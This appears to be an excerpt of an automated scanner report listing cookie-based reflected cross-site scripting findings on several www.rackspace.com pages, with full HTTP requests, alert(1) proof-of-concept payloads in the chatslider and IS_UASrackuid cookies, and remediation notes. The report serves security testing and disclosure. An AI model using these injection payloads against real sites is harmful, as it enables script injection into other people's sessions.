Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /partners/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f86970c"%3balert(1)//95c551d7ddc; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ffad"><script>alert(1)</script>49970b9e8aa was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /partners/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D6ffad"><script>alert(1)</script>49970b9e8aa; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad1ab"%3balert(1)//15908c5f963 was submitted in the chatslider cookie. This input was echoed as ad1ab";alert(1)//15908c5f963 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /partners/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dad1ab"%3balert(1)//15908c5f963; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5223d"%3balert(1)//bf0f8dce14f was submitted in the IS_UASrackuid cookie. This input was echoed as 5223d";alert(1)//bf0f8dce14f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /partners/partnersearch.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f85223d"%3balert(1)//bf0f8dce14f; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 590ce"><script>alert(1)</script>34d29e7b245 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /partners/partnersearch.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8590ce"><script>alert(1)</script>34d29e7b245; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77688"%3balert(1)//c63a589e70b was submitted in the chatslider cookie. This input was echoed as 77688";alert(1)//c63a589e70b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /partners/partnersearch.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D77688"%3balert(1)//c63a589e70b; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10e31"><script>alert(1)</script>1b755703283 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /partners/partnersearch.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D10e31"><script>alert(1)</script>1b755703283; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1760"%3balert(1)//4e42ec6c367 was submitted in the IS_UASrackuid cookie. This input was echoed as a1760";alert(1)//4e42ec6c367 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /searchresults.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41da1760"%3balert(1)//4e42ec6c367; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dec5"><script>alert(1)</script>6c5e22a6ae6 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /searchresults.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d2dec5"><script>alert(1)</script>6c5e22a6ae6; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8b9a"%3balert(1)//2f050a2a0f8 was submitted in the chatslider cookie. This input was echoed as c8b9a";alert(1)//2f050a2a0f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /searchresults.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Ac8b9a"%3balert(1)//2f050a2a0f8; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9afc3"><script>alert(1)</script>d270610666f was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /searchresults.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A9afc3"><script>alert(1)</script>d270610666f; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e8e8"><script>alert(1)</script>a3bb3e2a670 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /sitemap.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f84e8e8"><script>alert(1)</script>a3bb3e2a670; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c486e"%3balert(1)//82d98daa8db was submitted in the IS_UASrackuid cookie. This input was echoed as c486e";alert(1)//82d98daa8db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8c486e"%3balert(1)//82d98daa8db; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:46:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 39275
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49409"><script>alert(1)</script>8d089914acf was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /sitemap.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
